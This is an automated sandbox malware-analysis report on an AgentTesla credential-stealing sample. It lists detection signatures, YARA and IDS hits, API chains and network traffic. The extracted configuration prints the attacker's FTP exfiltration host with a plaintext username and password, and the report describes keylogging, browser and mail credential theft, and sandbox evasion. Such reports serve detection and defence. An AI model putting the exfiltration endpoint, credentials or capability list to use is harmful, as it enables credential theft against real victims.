Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Q5QrxfKnFA.exe

Overview

General Information

Sample name:Q5QrxfKnFA.exe
renamed because original name is a hash value
Original sample name:bc3bb7cdc4c87d2888c0c64f15f9953a79da7baa2d31874dd168db28f2b79256.exe
Analysis ID:1588712
MD5:f3dc9b8005c8237c3ad3a186af2a6ade
SHA1:c7a53f05a6c630787fbde778ac6e882f0e7a1e34
SHA256:bc3bb7cdc4c87d2888c0c64f15f9953a79da7baa2d31874dd168db28f2b79256
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Generic Downloader
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Q5QrxfKnFA.exe (PID: 2276 cmdline: "C:\Users\user\Desktop\Q5QrxfKnFA.exe" MD5: F3DC9B8005C8237C3AD3A186AF2A6ADE)
    • RegSvcs.exe (PID: 4364 cmdline: "C:\Users\user\Desktop\Q5QrxfKnFA.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "w133y@jeepcommerce.rs", "Password": "Q6]7rLSD*gU2"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000002.00000002.4590853406.00000000029A1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000002.00000002.4590853406.00000000029CE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 9 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Q5QrxfKnFA.exe.5a0000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Q5QrxfKnFA.exe.5a0000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.Q5QrxfKnFA.exe.5a0000.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x32903:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x32975:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x329ff:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x32a91:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x32afb:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x32b6d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x32c03:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x32c93:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.Q5QrxfKnFA.exe.5a0000.1.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x2faf7:$s2: GetPrivateProfileString
                  • 0x2f1d4:$s3: get_OSFullName
                  • 0x30838:$s5: remove_Key
                  • 0x3099b:$s5: remove_Key
                  • 0x318f3:$s6: FtpWebRequest
                  • 0x328e5:$s7: logins
                  • 0x32e57:$s7: logins
                  • 0x35b5c:$s7: logins
                  • 0x35c1a:$s7: logins
                  • 0x3756d:$s7: logins
                  • 0x367b4:$s9: 1.85 (Hash, version 2, native byte-order)
                  2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 9 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T04:31:40.469948+010020299271A Network Trojan was detected192.168.2.649710195.252.110.25321TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-11T04:31:41.053633+010028555421A Network Trojan was detected192.168.2.649712195.252.110.25358243TCP
                    2025-01-11T04:31:41.058985+010028555421A Network Trojan was detected192.168.2.649712195.252.110.25358243TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: http://ftp.jeepcommerce.rsAvira URL Cloud: Label: malware
                    Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.jeepcommerce.rs", "Username": "w133y@jeepcommerce.rs", "Password": "Q6]7rLSD*gU2"}
                    Source: Q5QrxfKnFA.exeReversingLabs: Detection: 79%
                    Source: Q5QrxfKnFA.exeVirustotal: Detection: 57%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: Q5QrxfKnFA.exeJoe Sandbox ML: detected
                    Source: Q5QrxfKnFA.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: wntdll.pdbUGP source: Q5QrxfKnFA.exe, 00000000.00000003.2123339721.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2120531844.00000000034F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Q5QrxfKnFA.exe, 00000000.00000003.2123339721.0000000003690000.00000004.00001000.00020000.00000000.sdmp, Q5QrxfKnFA.exe, 00000000.00000003.2120531844.00000000034F0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_003A445A
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AC6D1 FindFirstFileW,FindClose,0_2_003AC6D1
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_003AC75C
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AEF95
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_003AF0F2
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003AF3F3
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A37EF
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_003A3B12
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003ABCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_003ABCBC

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.6:49712 -> 195.252.110.253:58243
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.6:49710 -> 195.252.110.253:21
                    Source: Yara matchFile source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: global trafficTCP traffic: 192.168.2.6:49712 -> 195.252.110.253:58243
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 195.252.110.253 195.252.110.253
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownFTP traffic detected: 195.252.110.253:21 -> 192.168.2.6:49710 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 1 of 50 allowed.220-Local time is now 04:31. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_003B22EE
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: ftp.jeepcommerce.rs
                    Source: RegSvcs.exe, 00000002.00000002.4590853406.00000000029CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.jeepcommerce.rs
                    Source: RegSvcs.exe, 00000002.00000002.4590853406.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: Q5QrxfKnFA.exe, 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4590853406.0000000002971000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4590295730.0000000000EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: RegSvcs.exe, 00000002.00000002.4590295730.0000000000EC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hostingP
                    Source: RegSvcs.exe, 00000002.00000002.4590853406.0000000002971000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Q5QrxfKnFA.exe, 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4589295226.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003B4164
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_003B4164
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_003B3F66
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_003A001C
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_003CCABC

                    System Summary

                    barindex
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: This is a third-party compiled AutoIt script.0_2_00343B3A
                    Source: Q5QrxfKnFA.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Q5QrxfKnFA.exe, 00000000.00000000.2108919317.00000000003F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e04b0641-d
                    Source: Q5QrxfKnFA.exe, 00000000.00000000.2108919317.00000000003F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4e79f196-5
                    Source: Q5QrxfKnFA.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c5124405-9
                    Source: Q5QrxfKnFA.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_63c6e21b-2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003AA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_003AA1EF
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00398310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00398310
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003A51BD
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036D9750_2_0036D975
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0034FCE00_2_0034FCE0
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003621C50_2_003621C5
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003762D20_2_003762D2
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003C03DA0_2_003C03DA
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0037242E0_2_0037242E
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003625FA0_2_003625FA
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0039E6160_2_0039E616
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0034E6A00_2_0034E6A0
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003566E10_2_003566E1
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0037878F0_2_0037878F
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003588080_2_00358808
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003C08570_2_003C0857
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003768440_2_00376844
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003A88890_2_003A8889
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036CB210_2_0036CB21
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00376DB60_2_00376DB6
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00356F9E0_2_00356F9E
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003530300_2_00353030
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003631870_2_00363187
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036F1D90_2_0036F1D9
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003412870_2_00341287
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003614840_2_00361484
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003555200_2_00355520
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003676960_2_00367696
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003557600_2_00355760
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003619780_2_00361978
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00379AB50_2_00379AB5
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0036BDA60_2_0036BDA6
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00361D900_2_00361D90
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_003C7DDB0_2_003C7DDB
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_0034DF000_2_0034DF00
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00353FE00_2_00353FE0
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: 0_2_00C723E80_2_00C723E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00DF4A882_2_00DF4A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00DF3E702_2_00DF3E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00DF41B82_2_00DF41B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0623C3802_2_0623C380
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0623AAE82_2_0623AAE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B66E02_2_062B66E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B52682_2_062B5268
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062BC2902_2_062BC290
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062BB3182_2_062BB318
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B31302_2_062B3130
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B7E682_2_062B7E68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B77882_2_062B7788
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062BE4B82_2_062BE4B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B00402_2_062B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B59C72_2_062B59C7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_062B00062_2_062B0006
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: String function: 00360AE3 appears 70 times
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: String function: 00347DE1 appears 35 times
                    Source: C:\Users\user\Desktop\Q5QrxfKnFA.exeCode function: String function: 00368900 appears 42 times
                    Source: Q5QrxfKnFA.exe, 00000000.00000003.2124261107.0000000003613000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Q5QrxfKnFA.exe
                    Source: Q5QrxfKnFA.exe, 00000000.00000003.2121241997.00000000037BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Q5QrxfKnFA.exe
                    Source: Q5QrxfKnFA.exe, 00000000.00000002.2132313586.00000000005A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilename90cf818a-462d-43ad-9b06-442ae93cc408.exe4 vs Q5QrxfKnFA.exe
                    Source: Q5QrxfKnFA.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Q5QrxfKnFA.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
